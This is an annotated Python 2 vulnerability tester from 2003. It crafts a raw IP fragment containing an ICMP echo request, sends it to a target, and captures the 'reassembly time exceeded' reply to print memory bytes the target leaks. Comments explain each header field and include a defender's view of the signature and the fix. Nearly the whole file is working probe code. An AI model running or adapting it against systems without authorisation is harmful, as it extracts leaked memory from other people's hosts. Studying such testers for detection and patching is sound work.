#! /usr/bin/python
#############################################################################
##                                                                         ##
## icmpleaktest.py --- tester for the ICMP leak vulnerability              ##
##                                                                         ##
## Copyright (C) 2003 Philippe Biondi                                      ##
##                                                                         ##
## This program is free software; you can redistribute it and/or modify it ##
## under the terms of the GNU General Public License as published by the   ##
## Free Software Foundation; either version 2, or (at your option) any     ##
## later version.                                                          ##
##                                                                         ##
## This program is distributed in the hope that it will be useful, but     ##
## WITHOUT ANY WARRANTY; without even the implied warranty of              ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU       ##
## General Public License for more details.                                ##
##                                                                         ##
#############################################################################

# Python 2 script (print statements; one-character str slices are fed to
# ord()).  It will not run unmodified under Python 3.
#
# What it does: builds one IP *fragment* (More-Fragments bit set, offset 0)
# that carries an ICMP echo-request header plus an 18-byte payload, sends it
# to <target> through a raw socket, and then sniffs for the ICMP
# "time exceeded / fragment reassembly time exceeded" (type 11, code 1)
# message the target emits once the datagram fails to complete.  Any bytes
# that reply quotes *beyond* the probe's own payload are printed: a host with
# the leak echoes back memory it should never have disclosed.  A host that is
# not affected quotes only the probe itself, so the printed string is empty.
#
# Requirements that the code makes visible: raw sockets (IPPROTO_RAW with
# IP_HDRINCL, i.e. root) and a Linux AF_PACKET socket for the capture.
#
# Defender's view: the signal to watch for on the wire is an ICMP type 11
# code 1 whose quoted datagram is longer than the fragment that triggered
# it; the fix on the responder side is to bound the quoted data.

import sys,os,time
from socket import *

# NOTE(review): the usage text appears truncated in this copy of the file --
# the single positional argument is the target address, see sys.argv[1] below.
if len(sys.argv) != 2:
    print "Usage: icmpleaktest.py "
    sys.exit(1)

target = sys.argv[1]

ETH_P_IP = 0x800          # EtherType for IPv4, used to filter the capture socket
load = 18*"X"             # known filler; everything echoed back after it is "extra"

# IPv4 header, 20 bytes, field by field:
#   'E'          version 4, IHL 5 (20-byte header)
#   \x00         TOS
#   \x00\x1c     total length 28 (header + 8-byte ICMP header only; on Linux
#                the kernel rewrites this field when IP_HDRINCL is set, see raw(7))
#   \x12\x34     identification 0x1234 -- used below to recognise our own probe
#                inside the quoted datagram of the ICMP reply
#   \x20\x00     flags/offset: More-Fragments bit set, fragment offset 0.
#                This is the whole trick: a first fragment whose remainder
#                never arrives, so the target's reassembly timer fires.
#   '@'          TTL 64
#   \x01         protocol ICMP
#   \x00\x00     header checksum, left zero (filled in by the kernel, raw(7))
#   \x00\x00\x00\x00  source address, left zero (filled in by the kernel)
packet = 'E\x00\x00\x1c\x12\x34\x20\x00@\x01\x00\x00\x00\x00\x00\x00'
packet += inet_aton(target)
# ICMP echo request header: type 8, code 0, checksum 0xf7ff (the one's
# complement of 0x0800, i.e. valid for these 8 bytes alone -- the 'X' payload
# appended next is not covered; presumably irrelevant because the datagram is
# never reassembled and so never handed to the ICMP layer), id 0, seq 0.
packet += '\x08\x00\xf7\xff\x00\x00\x00\x00'
packet += load

s=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
s.setsockopt(SOL_IP, IP_HDRINCL, 1)            # we supply the IP header ourselves
t=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP)) # link-layer capture of IPv4 frames

# Child process: a 31-second countdown (30..0, one second each) printed on
# stdout.  If the parent has not seen the reply by then, the child prints a
# hint and exits.  Note that the child's exit does NOT stop the parent's
# receive loop below; the user has to interrupt it, as the parent's message
# says.
pid = os.fork()
if not pid:
    i=30
    while i >= 0:
        time.sleep(1)
        os.write(1,"%3i\r"%i)
        i -= 1
    print "not received ? Maybe you can't emit fragmented packets (ip_conntrack ?)"
    sys.exit()

# Parent: send the probe once, then wait for the target's reassembly timeout
# to expire (the "31s" in the message; presumably the target's timer).
s.sendto(packet, (target,0))
print "Packet sent. Answer should take 31s. Interrupt with C-c"

while 1:
    p = t.recv(1600)[14:]                       # drop the 14-byte Ethernet header
    if ord(p[9]) != IPPROTO_ICMP:               # IP protocol field (offset 9)
        continue
    p = p[(ord(p[0])&0x0f)*4:]                  # skip IHL*4 bytes of IP header -> ICMP
    if p[:2] != "\x0b\x01": #ip reassembly time exceeded
        continue
    p = p[8:]                                   # skip the 8-byte ICMP header -> quoted IP datagram
    if p[4:6] != "\x12\x34":                    # quoted identification must be our 0x1234
        continue
    # Skip the quoted IP header, the 8 bytes of ICMP echo header and our own
    # 18-byte filler; what is left is data the responder appended on its own.
    p = p[(ord(p[0])&0x0f)*4+8+len(load):]
    os.kill(pid,9)                              # stop the countdown child (not reaped; exits right after)
    print "Got",repr(p)
    break